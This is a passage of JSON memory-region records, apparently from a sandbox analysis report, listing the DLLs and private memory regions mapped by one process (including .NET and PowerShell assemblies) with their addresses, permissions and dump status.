"ref_process_dump": null, "size": 40960, "start_va": 1947926528, "type": "region", "version": 1 }, "end_va": 1947967487, "entry_point": 1947946272, "filename": "\\Windows\\System32\\slc.dll", "id": "region_585", "name": "slc.dll", "norm_filename": "c:\\windows\\system32\\slc.dll", "region_type": "memory_mapped_file", "start_va": 1947926528, "timestamp": "00:00:32.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1964900352, "type": "region", "version": 1 }, "end_va": 1964990463, "entry_point": 1964912067, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_586", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1964900352, "timestamp": "00:00:32.422", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1962409984, "type": "region", "version": 1 }, "end_va": 1962651647, "entry_point": 1962414733, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_587", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1962409984, "timestamp": "00:00:32.439", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 491520, "start_va": 1616445440, "type": "region", "version": 1 }, "end_va": 1616936959, "entry_point": 1616508858, "filename": "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", "id": "region_588", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 1616445440, "timestamp": "00:00:32.456", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1959133184, "type": "region", "version": 1 }, "end_va": 1959170047, "entry_point": 1959137824, "filename": "\\Windows\\System32\\version.dll", "id": "region_589", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 1959133184, "timestamp": "00:00:32.473", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 2625535, "entry_point": 0, "filename": null, "id": "region_590", "name": "pagefile_0x0000000000280000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2621440, "timestamp": "00:00:32.545", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000591-addr_0x0000000001cc0000-size_0x0000000000040000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_66", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 30146560, "type": "region", "version": 1 }, "end_va": 30408703, "entry_point": 0, "filename": null, "id": "region_591", "name": "private_0x0000000001cc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30146560, "timestamp": "00:00:32.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 5943296, "start_va": 1596588032, "type": "region", "version": 1 }, "end_va": 1602531327, "entry_point": 1596588032, "filename": "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll", "id": "region_592", "name": "mscorwks.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll", "region_type": "memory_mapped_file", "start_va": 1596588032, "timestamp": "00:00:32.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 634880, "start_va": 1916469248, "type": "region", "version": 1 }, "end_va": 1917104127, "entry_point": 1916469248, "filename": "\\Windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll", "id": "region_593", "name": "msvcr80.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll", "region_type": "memory_mapped_file", "start_va": 1916469248, "timestamp": "00:00:32.752", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2691071, "entry_point": 0, "filename": null, "id": "region_594", "name": "pagefile_0x0000000000290000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2686976, "timestamp": "00:00:33.518", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 2756607, "entry_point": 0, "filename": null, "id": "region_595", "name": "pagefile_0x00000000002a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2752512, "timestamp": "00:00:33.518", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000596-addr_0x0000000001200000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_67", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 18874368, "type": "region", "version": 1 }, "end_va": 18939903, "entry_point": 0, "filename": null, "id": "region_596", "name": "private_0x0000000001200000", "norm_filename": null, "region_type": "private_memory", "start_va": 18874368, "timestamp": "00:00:33.519", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000597-addr_0x0000000001210000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_68", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 18939904, "type": "region", "version": 1 }, "end_va": 19005439, "entry_point": 0, "filename": null, "id": "region_597", "name": "private_0x0000000001210000", "norm_filename": null, "region_type": "private_memory", "start_va": 18939904, "timestamp": "00:00:33.519", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000598-addr_0x0000000001220000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_69", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 19005440, "type": "region", "version": 1 }, "end_va": 19070975, "entry_point": 0, "filename": null, "id": "region_598", "name": "private_0x0000000001220000", "norm_filename": null, "region_type": "private_memory", "start_va": 19005440, "timestamp": "00:00:33.519", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000599-addr_0x0000000001350000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_70", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 20250624, "type": "region", "version": 1 }, "end_va": 20316159, "entry_point": 0, "filename": null, "id": "region_599", "name": "private_0x0000000001350000", "norm_filename": null, "region_type": "private_memory", "start_va": 20250624, "timestamp": "00:00:33.520", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000600-addr_0x0000000001360000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_71", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 20316160, "type": "region", "version": 1 }, "end_va": 20381695, "entry_point": 0, "filename": null, "id": "region_600", "name": "private_0x0000000001360000", "norm_filename": null, "region_type": "private_memory", "start_va": 20316160, "timestamp": "00:00:33.520", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000601-addr_0x0000000001370000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_72", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 20381696, "type": "region", "version": 1 }, "end_va": 20447231, "entry_point": 0, "filename": null, "id": "region_601", "name": "private_0x0000000001370000", "norm_filename": null, "region_type": "private_memory", "start_va": 20381696, "timestamp": "00:00:33.523", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000602-addr_0x0000000001c10000-size_0x00000000000a0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_73", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 655360, "start_va": 29425664, "type": "region", "version": 1 }, "end_va": 30081023, "entry_point": 0, "filename": null, "id": "region_602", "name": "private_0x0000000001c10000", "norm_filename": null, "region_type": "private_memory", "start_va": 29425664, "timestamp": "00:00:33.523", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000603-addr_0x0000000001d00000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_74", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 30408704, "type": "region", "version": 1 }, "end_va": 30670847, "entry_point": 0, "filename": null, "id": "region_603", "name": "private_0x0000000001d00000", "norm_filename": null, "region_type": "private_memory", "start_va": 30408704, "timestamp": "00:00:33.524", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000604-addr_0x0000000001e70000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_75", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 31916032, "type": "region", "version": 1 }, "end_va": 31981567, "entry_point": 0, "filename": null, "id": "region_604", "name": "private_0x0000000001e70000", "norm_filename": null, "region_type": "private_memory", "start_va": 31916032, "timestamp": "00:00:33.524", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 33554432, "start_va": 31981568, "type": "region", "version": 1 }, "end_va": 65535999, "entry_point": 0, "filename": null, "id": "region_605", "name": "private_0x0000000001e80000", "norm_filename": null, "region_type": "private_memory", "start_va": 31981568, "timestamp": "00:00:33.525", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000606-addr_0x0000000003ef0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_76", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 65994752, "type": "region", "version": 1 }, "end_va": 66256895, "entry_point": 0, "filename": null, "id": "region_606", "name": "private_0x0000000003ef0000", "norm_filename": null, "region_type": "private_memory", "start_va": 65994752, "timestamp": "00:00:33.525", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11501568, "start_va": 1585053696, "type": "region", "version": 1 }, "end_va": 1596555263, "entry_point": 1585053696, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll", "id": "region_607", "name": "mscorlib.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll", "region_type": "memory_mapped_file", "start_va": 1585053696, "timestamp": "00:00:33.526", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000608-addr_0x000000007ffda000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_77", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147328000, "type": "region", "version": 1 }, "end_va": 2147332095, "entry_point": 0, "filename": null, "id": "region_608", "name": "private_0x000000007ffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147328000, "timestamp": "00:00:33.538", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000609-addr_0x000000007ffdb000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_78", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147332096, "type": "region", "version": 1 }, "end_va": 2147336191, "entry_point": 0, "filename": null, "id": "region_609", "name": "private_0x000000007ffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147332096, "timestamp": "00:00:33.538", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000635-addr_0x0000000001380000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_89", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 20447232, "type": "region", "version": 1 }, "end_va": 20512767, "entry_point": 0, "filename": null, "id": "region_635", "name": "private_0x0000000001380000", "norm_filename": null, "region_type": "private_memory", "start_va": 20447232, "timestamp": "00:00:34.857", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 66256896, "type": "region", "version": 1 }, "end_va": 69279743, "entry_point": 66256896, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_636", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 66256896, "timestamp": "00:00:34.857", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 7979008, "start_va": 1577058304, "type": "region", "version": 1 }, "end_va": 1585037311, "entry_point": 1577058304, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\9e0a3b9b9f457233a335d7fba8f95419\\System.ni.dll", "id": "region_637", "name": "system.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\9e0a3b9b9f457233a335d7fba8f95419\\system.ni.dll", "region_type": "memory_mapped_file", "start_va": 1577058304, "timestamp": "00:00:34.868", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 528384, "start_va": 1604648960, "type": "region", "version": 1 }, "end_va": 1605177343, "entry_point": 1604648960, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\4bdde288f147e3b3f2c090ecdf704e6d\\Microsoft.PowerShell.ConsoleHost.ni.dll", "id": "region_638", "name": "microsoft.powershell.consolehost.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\4bdde288f147e3b3f2c090ecdf704e6d\\microsoft.powershell.consolehost.ni.dll", "region_type": "memory_mapped_file", "start_va": 1604648960, "timestamp": "00:00:34.881", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 8888320, "start_va": 1565065216, "type": "region", "version": 1 }, "end_va": 1573953535, "entry_point": 1565065216, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\a8e3a41ecbcc4bb1598ed5719f965110\\System.Management.Automation.ni.dll", "id": "region_639", "name": "system.management.automation.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management.a#\\a8e3a41ecbcc4bb1598ed5719f965110\\system.management.automation.ni.dll", "region_type": "memory_mapped_file", "start_va": 1565065216, "timestamp": "00:00:35.279", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 1573978112, "type": "region", "version": 1 }, "end_va": 1577000959, "entry_point": 1576659998, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_640", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 1573978112, "timestamp": "00:00:35.321", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 20774912, "type": "region", "version": 1 }, "end_va": 20787199, "entry_point": 20774912, "filename": "\\Windows\\System32\\l_intl.nls", "id": "region_642", "name": "l_intl.nls", "norm_filename": "c:\\windows\\system32\\l_intl.nls", "region_type": "memory_mapped_file", "start_va": 20774912, "timestamp": "00:00:35.344", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 69337088, "type": "region", "version": 1 }, "end_va": 70123519, "entry_point": 69337088, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_643", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 69337088, "timestamp": "00:00:35.345", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1980563456, "type": "region", "version": 1 }, "end_va": 1980583935, "entry_point": 1980568632, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_644", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 1980563456, "timestamp": "00:00:35.403", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000645-addr_0x00000000013e0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_90", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 20840448, "type": "region", "version": 1 }, "end_va": 20844543, "entry_point": 0, "filename": null, "id": "region_645", "name": "private_0x00000000013e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 20840448, "timestamp": "00:00:35.464", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20480, "start_va": 20905984, "type": "region", "version": 1 }, "end_va": 20926463, "entry_point": 20905984, "filename": "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "id": "region_646", "name": "sorttbls.nlp", "norm_filename": "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "region_type": "memory_mapped_file", "start_va": 20905984, "timestamp": "00:00:35.524", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 266240, "start_va": 31195136, "type": "region", "version": 1 }, "end_va": 31461375, "entry_point": 31195136, "filename": "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "id": "region_647", "name": "sortkey.nlp", "norm_filename": "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "region_type": "memory_mapped_file", "start_va": 31195136, "timestamp": "00:00:35.524", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 30081024, "type": "region", "version": 1 }, "end_va": 30113791, "entry_point": 30081024, "filename": "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll", "id": "region_650", "name": "microsoft.wsman.runtime.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll", "region_type": "memory_mapped_file", "start_va": 30081024, "timestamp": "00:00:36.468", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 30670848, "type": "region", "version": 1 }, "end_va": 30674943, "entry_point": 0, "filename": null, "id": "region_651", "name": "pagefile_0x0000000001d40000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30670848, "timestamp": "00:00:36.480", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 274432, "start_va": 31522816, "type": "region", "version": 1 }, "end_va": 31797247, "entry_point": 31522816, "filename": "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_652", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 31522816, "timestamp": "00:00:36.480", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 638976, "start_va": 1561460736, "type": "region", "version": 1 }, "end_va": 1562099711, "entry_point": 1561460736, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Transactions\\ad18f93fc713db2c4b29b25116c13bd8\\System.Transactions.ni.dll", "id": "region_653", "name": "system.transactions.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.transactions\\ad18f93fc713db2c4b29b25116c13bd8\\system.transactions.ni.dll", "region_type": "memory_mapped_file", "start_va": 1561460736, "timestamp": "00:00:36.490", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 544768, "start_va": 1562116096, "type": "region", "version": 1 }, "end_va": 1562660863, "entry_point": 1562116096, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.WSMan.Man#\\f1865caa683ceb3d12b383a94a35da14\\Microsoft.WSMan.Management.ni.dll", "id": "region_654", "name": "microsoft.wsman.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.wsman.man#\\f1865caa683ceb3d12b383a94a35da14\\microsoft.wsman.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 1562116096, "timestamp": "00:00:36.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2314240, "start_va": 1562705920, "type": "region", "version": 1 }, "end_va": 1565020159, "entry_point": 1562705920, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Core\\fbc05b5b05dc6366b02b8e2f77d080f1\\System.Core.ni.dll", "id": "region_655", "name": "system.core.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.core\\fbc05b5b05dc6366b02b8e2f77d080f1\\system.core.ni.dll", "region_type": "memory_mapped_file", "start_va": 1562705920, "timestamp": "00:00:36.522", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 274432, "start_va": 1739194368, "type": "region", "version": 1 }, "end_va": 1739468799, "entry_point": 1739452476, "filename": "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_656", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 1739194368, "timestamp": "00:00:36.542", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 307200, "start_va": 1798307840, "type": "region", "version": 1 }, "end_va": 1798615039, "entry_point": 1798307840, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\e112e4460a0c9122de8c382126da4a2f\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll", "id": "region_657", "name": "microsoft.powershell.commands.diagnostics.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\e112e4460a0c9122de8c382126da4a2f\\microsoft.powershell.commands.diagnostics.ni.dll", "region_type": "memory_mapped_file", "start_va": 1798307840, "timestamp": "00:00:36.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 151552, "start_va": 1920925696, "type": "region", "version": 1 }, "end_va": 1921077247, "entry_point": 1920925696, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuratio#\\f02737c83305687a68c088927a6c5a98\\System.Configuration.Install.ni.dll", "id": "region_658", "name": "system.configuration.install.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuratio#\\f02737c83305687a68c088927a6c5a98\\system.configuration.install.ni.dll", "region_type": "memory_mapped_file", "start_va": 1920925696, "timestamp": "00:00:36.560", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 30736384, "type": "region", "version": 1 }, "end_va": 30740479, "entry_point": 0, "filename": null, "id": "region_659", "name": "pagefile_0x0000000001d50000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30736384, "timestamp": "00:00:37.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 798720, "start_va": 1558904832, "type": "region", "version": 1 }, "end_va": 1559703551, "entry_point": 1558904832, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\583c7b9f52114c026088bdb9f19f64e8\\Microsoft.PowerShell.Commands.Management.ni.dll", "id": "region_660", "name": "microsoft.powershell.commands.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\583c7b9f52114c026088bdb9f19f64e8\\microsoft.powershell.commands.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 1558904832, "timestamp": "00:00:37.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1559756800, "type": "region", "version": 1 }, "end_va": 1561452543, "entry_point": 1559756800, "filename": 